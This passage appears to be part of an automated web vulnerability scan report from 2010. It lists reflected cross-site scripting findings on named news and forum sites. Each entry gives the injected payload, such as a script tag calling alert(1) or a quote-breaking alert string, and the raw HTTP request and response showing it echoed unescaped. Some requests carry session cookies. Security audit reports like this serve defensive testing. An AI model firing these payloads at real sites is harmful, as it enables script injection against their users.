Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Nov 2010 02:05:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 31
ETag: "9376e5670915f5b3f41a4aa68c646341"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--b4a5a2069ac2cede71eeab9881eb479f97db86d4; path=/; expires=Tue, 15-Feb-2011 02:05:16 GMT; HttpOnly
Content-Length: 50288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/performers?aa537"><script>alert(1)</script>081b4c1c4b2=1" />
...[SNIP]...

3.44. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33257"><script>alert(1)</script>16f8b094cda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /restaurants?33257"><script>alert(1)</script>16f8b094cda=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Nov 2010 02:05:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 26
ETag: "4b9a2c25a7455fd486c0a373edd1cb25"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--b4a5a2069ac2cede71eeab9881eb479f97db86d4; path=/; expires=Tue, 15-Feb-2011 02:05:11 GMT; HttpOnly
Content-Length: 62158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/restaurants?33257"><script>alert(1)</script>16f8b094cda=1" />
...[SNIP]...

3.45. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /venues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305e4"><script>alert(1)</script>1a2aba766b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /venues?305e4"><script>alert(1)</script>1a2aba766b3=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Nov 2010 02:05:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 24
ETag: "ae8f296626583360b038a50f39b5bec3"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--b4a5a2069ac2cede71eeab9881eb479f97db86d4; path=/; expires=Tue, 15-Feb-2011 02:05:09 GMT; HttpOnly
Content-Length: 53864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/venues?305e4"><script>alert(1)</script>1a2aba766b3=1" />
...[SNIP]...

3.46. http://fisherinvestments.tt.omtrdc.net/m2/fisherinvestments/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisherinvestments.tt.omtrdc.net
Path:   /m2/fisherinvestments/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 86612<script>alert(1)</script>28ae8f0c402 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/fisherinvestments/mbox/standard?mboxHost=www.fi.com&mboxSession=1289788918105-814297&mboxPC=1289788918105-814297.20&mboxPage=1289789030080-283018&screenHeight=1200&screenWidth=1920&browserWidth=1192&browserHeight=836&browserTimeOffset=-360&colorDepth=undefined&mboxCount=1&mbox=FI_Alley_Letter_1K_TopLeft_Box86612<script>alert(1)</script>28ae8f0c402&mboxId=0&mboxTime=1289767430200&mboxURL=http%3A%2F%2Fwww.fi.com%2Fweballey%2Falleyletter.aspx%3Fcountry%3DUS%26PC%3DBANBANGA06%26CC%3DE599%26tycode%3Dfi2&mboxReferrer=http%3A%2F%2Fredcated%2FINV%2Fiview%2F255848431%2Fdirect%2F01%3Ftime%3D1289788980398715%26click%3Dhttp%3A%2F%2Fus.ard.yahoo.com%2FSIG%3D1633vc023%2FM%3D601059734.601396926.490165551.437049551%2FD%3Dnchome%2FS%3D2022775704%3ALREC%2FY%3DPARTNER_US%2FL%3D0f9637da-f062-11df-b499-bfd373c14344%2FB%3DrnRzDtFJo9U-%2FJ%3D1289788980398715%2FK%3Df4FF1VJJPGvwH7USsI1TdQ%2FEXP%3D1289796180%2FA%3D2105245011572051340%2FR%3D2%2FX%3D2%2F*&mboxVersion=39 HTTP/1.1
Accept: */*
Referer: http://www.fi.com/weballey/alleyletter.aspx?country=US&PC=BANBANGA06&CC=E599&tycode=fi2
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: fisherinvestments.tt.omtrdc.net
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 152
Date: Mon, 15 Nov 2010 03:52:31 GMT
Server: Test & Target

mboxFactories.get('default').get('FI_Alley_Letter_1K_TopLeft_Box86612<script>alert(1)</script>28ae8f0c402',0).setOffer(new mboxOfferDefault()).loaded();

3.47. http://forums.contracostatimes.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.contracostatimes.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4adba"-alert(1)-"e41b940e332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4adba"-alert(1)-"e41b940e332=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:51 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
pt language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / ?4adba"-alert(1)-"e41b940e332=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.48. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.contracostatimes.com
Path:   /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41bf8"-alert(1)-"353834f6171 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll41bf8"-alert(1)-"353834f6171/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll41bf8"-alert(1)-"353834f6171/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getC
...[SNIP]...

3.49. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.contracostatimes.com
Path:   /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1011"-alert(1)-"87110bc119c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11d1011"-alert(1)-"87110bc119c HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:31 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
e="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11d1011"-alert(1)-"87110bc119c";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.50. http://forums.contracostatimes.com/poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.contracostatimes.com
Path:   /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ee8e"-alert(1)-"47271c9d198 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11?8ee8e"-alert(1)-"47271c9d198=1 HTTP/1.1
Host: forums.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESS9e585f50d5cd2ca75de6d8dfa5981bd5=68011fed6a78ec690b4356a0c08486bb;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:05:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll/how-many-wins-will-golden-state-warriors-finish-with-in-2010-11?8ee8e"-alert(1)-"47271c9d198=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.51. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e58"-alert(1)-"da78a3fd75c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?91e58"-alert(1)-"da78a3fd75c=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:11:57 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=6ec373c57579c10d331d00c8ebed1d1d; expires=Wed, 08 Dec 2010 02:45:17 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
pt language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / ?91e58"-alert(1)-"da78a3fd75c=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.52. http://forums.mercurynews.com/forum/576 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/576

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45812"-alert(1)-"613868a3771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum45812"-alert(1)-"613868a3771/576 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum45812"-alert(1)-"613868a3771/576";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=get
...[SNIP]...

3.53. http://forums.mercurynews.com/forum/576 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/576

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79cf3"-alert(1)-"89396556484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/57679cf3"-alert(1)-"89396556484 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
age="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/57679cf3"-alert(1)-"89396556484";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.54. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/576

Issue detail

